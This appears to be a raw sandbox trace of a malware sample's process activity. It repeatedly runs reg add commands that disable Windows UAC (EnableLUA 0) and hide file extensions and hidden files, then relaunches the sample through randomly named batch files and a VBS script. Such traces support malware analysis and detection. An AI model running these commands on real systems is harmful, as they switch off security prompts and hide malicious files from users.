reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jmsYMQUg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XUMsMwgg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uYMwcYMY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\oQIgIYEA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\KkoQEEAE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uEsIcMkY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\UukMsoAA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HAUAscgY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\JgYIIIAE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\pMwMoAUw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZkEcEoQs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yyEgwYAs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yEYEwkgU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\egMIgEMU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AAwsgEQk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qMgQMwgQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wQwQUMsA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hkUMQwMs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RiEcEoYo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HwMUsccY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xWEQEoUI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YwAsgIUA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SAQkoYoc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
